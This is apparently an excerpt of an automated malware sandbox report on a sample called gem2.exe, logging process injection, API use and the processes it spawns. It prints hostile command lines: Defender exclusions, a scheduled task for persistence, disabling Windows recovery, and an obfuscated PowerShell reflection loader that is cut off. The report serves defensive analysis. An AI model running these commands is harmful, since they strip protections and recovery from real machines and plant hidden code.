Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F132290000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 35B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 252D6430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B60FF60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 3060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 25E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2780000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 830000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: DF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 26D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 28C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 25C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 25A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 12B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: FE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2BF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2D70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 24B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 14B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 27E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 14A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 12F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 1190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2830000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 1010000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2F20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2F90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 25A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: E90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 26E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2C30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2880000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2910000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2FD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2670000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 1090000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 10A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8337D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2112DE50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F5A9650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9A25C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 173D0380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 237164F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1C59D2E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2AC381E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2AC38210000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\curl.exe base: 23245EF0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\curl.exe base: 23245EF0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\curl.exe base: 23245EF0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\curl.exe base: 23245EF0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\curl.exe base: 23245EF0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\curl.exe base: 23245EF0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\curl.exe base: 23245EF0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\curl.exe base: 23245EF0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\curl.exe base: 23245EF0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\curl.exe base: 23245EF0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\curl.exe base: 23245EF0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F5A9380000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F5A9390000
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: shared_ptr,GetModuleHandleW,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle, \explorer.exe14_2_00007FF6A54A20A0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: shared_ptr,GetModuleHandleW,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle, \explorer.exe17_2_00007FF7D16320A0
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /FJump to behavior
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get serialnumberJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get serialnumberJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.orgJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ReAgentc.exe reagentc /disableJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d5abccfd-b418-4ad6-92a2-7793c4b25dc9}Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\reagentc.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /grant administrators:F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:etrmmuykmezi{param([outputtype([type])][parameter(position=0)][type[]]$lqotnkeziwxxmy,[parameter(position=1)][type]$pzbfqvixvd)$sbbqvxxfari=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+'e'+[char](102)+''+'l'+''+[char](101)+''+[char](99)+'t'+[char](101)+''+'d'+''+'d'+''+[char](101)+''+[char](108)+''+'e'+'ga'+'t'+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'nm'+[char](101)+'m'+[char](111)+''+[char](114)+'y'+[char](77)+'od'+'u'+'l'+[char](101)+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+'e'+[char](108)+''+'e'+''+'g'+''+[char](97)+''+[char](116)+''+[char](101)+''+[char](84)+''+'y'+''+[char](112)+''+[char](101)+'','c'+'l'+''+'a'+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+''+[char](117)+''+'b'+''+[char](108)+'i'+[char](99)+''+[char](44)+'s'+[char](101)+''+[char](97)+'led'+[char](44)+'a'+[char](110)+''+[char](115)+''+'i'+''+'c'+''+[char](108)+''+'a'+'s'+[char](115)+''+[char](44)+''+[char](65)+''+[char](117)+'to'+'c'+'l'+'a'+''+[char](115)+''+'s'+'',[multicastdelegate]);$sbbqvxxfari.defineconstructor(''+[char](82)+''+'t'+''+[char](83)+''+[char](112)+''+[char](101)+''+'c'+'i'+[char](97)+''+[char](108)+''+[char](78)+'a'+[char](109)+''+[char](101)+''+','+''+[char](72)+''+'i'+''+[char](100)+'e'+'b'+''+'y'+''+[char](83)+'i'+[char](103)+''+[char](44)+'p'+[char](117)+''+[char](98)+''+[char](108)+''+[char](105)+''+'c'+'',[reflection.callingconventions]::standard,$lqotnkeziwxxmy).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+''+[char](105)+'m'+[char](101)+''+','+''+[char](77)+''+'a'+''+[char](110)+''+[char](97)+''+[char](103)+'ed');$sbbqvxxfari.definemethod(''+'i'+''+[char](110)+''+'v'+''+'o'+''+[char](107)+''+'e'+'',''+'p'+''+'u'+''+[char](98)+''+[char](108)+''+'i'+''+[char](99)+''+[char](44)+'h'+[char](105)+''+[char](100)+'e'+'b'+''+'y'+''+[char](83)+'i'+[char](103)+''+','+''+[char](78)+''+[char](101)+''+[char](119)+''+[char](83)+''+'l'+'ot'+[char](44)+'v'+[char](105)+''+[char](114)+'tual',$pzbfqvixvd,$lqotnkeziwxxmy).setimplementationflags('ru'+'n'+''+'t'+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+'n'+[char](97)+''+[char](103)+''+[char](101)+''+'d'+'');write-output $sbbqvxxfari.createtype();}$molktxqtnxyrw=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+'st'+'e'+'m'+'.'+''+[char](100)+''+[char](108)+''+'l'+'')}).gettype(''+'m'+''+[char](105)+''+[char](99)+''+[char](114)+'o'+[char](115)+''+[char](111)+''+[char](102)+''+[char](116)+''+[char](46)+''+'w'+''+[char](105)+''+[char](110)+''+[char](51)+''+[char](50)+''+[char](46)+''+[char](85)+'ns'+'a'+''+[char](102)+''+[char](101)+''+[char](78)+''+'a'+''+[char](116)+''+[char](105)+''+'v'+''+[char](101)+'m'+[char](101)+
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54A5790 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,14_2_00007FF6A54A5790
Source: dwm.exe, 0000003D.00000002.2559217301.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000003D.00000000.1539424742.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
Source: winlogon.exe, 00000036.00000000.1514410489.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000036.00000002.2551678749.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003D.00000000.1541202324.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000036.00000000.1514410489.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000036.00000002.2551678749.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003D.00000000.1541202324.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: winlogon.exe, 00000036.00000000.1514410489.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000036.00000002.2551678749.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003D.00000000.1541202324.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
Source: winlogon.exe, 00000036.00000000.1514410489.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000036.00000002.2551678749.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003D.00000000.1541202324.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_3_000001F5A9663290 cpuid 9_3_000001F5A9663290
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,14_2_00007FF6A54FF600
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: GetLocaleInfoEx,14_2_00007FF6A54DC884
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: GetLocaleInfoW,14_2_00007FF6A54F4750
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: EnumSystemLocalesW,14_2_00007FF6A54F4210
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_00007FF6A54FFE64
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: GetLocaleInfoW,14_2_00007FF6A54FFF14
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_00007FF6A5500048
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_00007FF6A54FFAC4
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: EnumSystemLocalesW,14_2_00007FF6A54FF95C
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: EnumSystemLocalesW,14_2_00007FF6A54FFA2C
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: GetLocaleInfoW,14_2_00007FF6A54FFD0C
Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,__crtDownlevelLocaleNameToLCID,GetLocaleInfoW,16_2_00000173CFC03080
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: EnumSystemLocalesW,17_2_00007FF7D1684210
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,17_2_00007FF7D168F600
